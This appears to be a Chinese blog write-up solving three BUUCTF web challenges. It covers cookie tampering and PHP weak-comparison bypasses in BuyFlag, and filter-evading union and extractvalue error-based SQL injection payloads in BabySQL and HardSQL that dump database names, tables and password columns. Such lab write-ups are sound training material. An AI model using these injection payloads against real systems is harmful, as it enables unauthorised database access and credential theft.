BUUCTF-web

最新推荐文章于 2024-06-24 16:17:13 发布
最新推荐文章于 2024-06-24 16:17:13 发布
阅读量2.3k 收藏
点赞数
分类专栏: ctf 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhhhb1005/article/details/124385111
版权

目录

[极客大挑战 2019]BuyFlag

[极客大挑战 2019]BabySQL

​ 

[极客大挑战 2019]HardSQL

[极客大挑战 2019]BuyFlag

打开网页,看一下源代码,发现有两个链接

不用管index.php,直接打开pay.php,出现提示

同时给出了购买flag的mone数量

查看cookie,发现user:0,将0改为1后页面发生变化

        让我输入password,但是不知道密码是多少,所以看一下源代码,发现了一些东西 

~~~post money and password~~~
if (isset($_POST['password'])) 
{
	$password = $_POST['password'];
	if (is_numeric($password))
 {
	echo "password can't be number";
 }
elseif ($password == 404) 
{
	echo "Password Right!";
}
}

is_numeric()

 函数用于检测变量是否为数字或数字字符串。

如果指定的变量是数字和数字字符串则返回 TRUE,否则返回 FALSE,注意浮点型返回 1,即 TRUE。

        因为elseif后面是弱比较,所以可以使密码为 下面,然后post传参

password=404a

        这里让我们为flag付钱,上面说了flag的价格,所以使用连接符&链接 ,但是又发生了新的情况,说数字长度太长了。所以这里可以使用数组或者科学计数法

 

password=404a&money=1e10

得到flag

[极客大挑战 2019]BabySQL

 

还是这个页面,使用密码' or 1=1#,出现提示页面

 

        发现是'闭合,所以对密码进行修改,改为' or '1=1# 接着提示,密码或者用户名错误,所以说明密码是可执行的,只不过是对什么东西进行了过滤,双写or,登录成功。

猜想正确,接下来就是标志步骤了,爆表,爆字段(列)

输入:

?username=1' oorrder bbyy 4;%23&password=1

 

 说明有3列

?username=1' uunionnion sselectelect 1,2,3;%23&password=1

 

说明回显在第2,3列。

?username=1' uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23&password=1

 

?username=1' uunionnion sselectelect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_schema=database() aandnd table_name='b4bsql' %23&password=1

 

有三列,继续。

?username=1' uunionnion sselectelect 1,2,group_concat(id,username,passwoorrd) ffromrom b4bsql %23&password=1

 

出现flag,复制提交即可。

[极客大挑战 2019]HardSQL

又是这种题目

 

 先试一试万能密码

        再试一次双写,还是同样的结果,可以使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号(这一题不太明白看了大佬们的wp才略懂一二。

使用extractvalue()

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database()))))%23

 

这一下子是直接把库名弄出来了。

爆表

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23

 

 爆字段

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23

 

然后对password进行爆破

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23

 

flag只出现了一半,使用right()对另一半爆破

/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23

 

连接在一起得出flag。 

 

 

S@Kura
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF——Web
2201_75331136的博客
07-11 950
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
buuctf web
个人笔记
02-19 3562
ctf web
BUUCTF--Web篇详细wp_buuctfweb
最新发布
2401_84301352的博客
06-24 588
php.iniInclude然后Base64解码就可以得到flag。
BUUCTF--web
zhhhb1005的博客
04-10 1545
目录 [极客大挑战 2019]EasySQL [极客大挑战 2019]Havefun [极客大挑战 2019]Secret File [极客大挑战 2019]LoveSQL [极客大挑战 2019]EasySQL 打开题目发现需要输入用户名和密码,因为刚刚看了万能密码,所以可以尝试使用万能密码绕过,得出flag。 [极客大挑战 2019]Havefun 点击网页进去以后发现是一只小猫,没有任何线索,所以就可以考虑查看源代码,发现一段php语句,是一个简单的get传值。 .
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF部分web题目
05-06
写题记录
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF-WEB
ccfly1012的博客
11-02 3806
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF WEB
qq_43633585的博客
09-28 399
warmup 题目描述 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_.
BUUCTF web
qq_40026795的博客
06-20 265
一、打开靶机页面是一个滑稽图片,查看一下源代码,得到提示source.php 二、访问source.php可以看到高亮源码,搜索相应内容,是CVE-2018-12613 PhpMyadmin后台文件包含漏洞的简化版本 针对关键代码分析如下: (1)白名单验证,三次验证,任何一次通过即视为通过。 (2)第一次验证,在白名单里通过。这里可以看到hint.php也在白名单,访问得到提示ffffl...
BUUCTF WEB 1
weixin_45689999的博客
04-06 498
easy_sql 题目提示是简单sql注入,可以先试试过滤了什么 1’ or ‘1’=‘1# 1’ and 1=1# 没有报错,证明or,and和#都没有被过滤 2)爆字段数 1’order by 2# 1’order by 3#报错 3)爆库 1’ union select database()# 返回return preg_match("/select|update|delete|drop|...
BUUCTF web(一)
热门推荐
Lemon's blog
10-16 1万+
前言:最近参加了一场CTF比赛,菜的一批,接下来多练习web题、MISC、密码学,多思考,提高一下自己做题的思路,以及代码审计、编写脚本的能力。 [HCTF 2018]WarmUp 查看源码,发现<!--source.php-->,打开发现源码 <?php highlight_file(__FILE__); if (! empty($_REQUEST['file...
BUUCTF web(一)
m0_46616663的博客
10-19 1630
[强网杯 2019]随便注 方法一 查询的过程中发现有过滤 尝试以下报错注入,用到了extractvalue() 简单讲一下extractvalue()。语法:extractvalue(目标xml文档,xml路径),路径为/xx/xx/…,如果路径非法就会报错并且返回非法内容,所以我们正可以借此查询到目标内容,用concat()拼接‘/’也是一样的,但是拼接‘~’就不合法了: 1’ and extractvalue(1,concat(’~’,database()))# 最长32位哈,超过32用subst
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值